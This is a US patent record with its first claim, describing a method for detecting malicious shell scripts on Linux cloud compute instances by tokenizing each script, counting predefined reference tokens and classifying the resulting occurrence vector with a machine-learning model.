	US 12,367,285 B1
	Detecting malicious shell scripts in compute instances of cloud computing platforms
Alfredo de Oliveira, Toronto (CA); and David Fiser, Toronto (CA)
Assigned to Trend Micro Incorporated, Tokyo (JP)
Filed by Trend Micro Incorporated, Tokyo (JP)
Filed on Jul. 19, 2023, as Appl. No. 18/354,886.
Int. Cl. G06F 21/56 (2013.01); G06N 20/10 (2019.01)

CPC G06F 21/566 (2013.01) [G06N 20/10 (2019.01); G06F 2221/034 (2013.01)]

10 Claims

1. A method of detecting malicious shell scripts, the method comprising:

receiving a target shell script in a compute instance of a plurality of compute instances of a cloud computing platform, the compute instance running a distribution of a LINUX operating system;

normalizing the target shell script into a set of tokens, the set of tokens comprising tokens of the target shell script that are separated by a predetermined separator;

searching the set of tokens for presence of reference tokens, the reference tokens comprising predefined tokens that are found in malicious shell scripts that attack compute instances and predefined tokens that are found in non-malicious shell scripts of compute instances;

counting a number of times each of the reference tokens appear in the set of tokens;

generating an occurrence vector of the target shell script, the occurrence vector indicating a count of each of the reference tokens found in the set of tokens; and

evaluating the occurrence vector in the compute instance using a machine learning model to determine if the target shell script is a malicious shell script.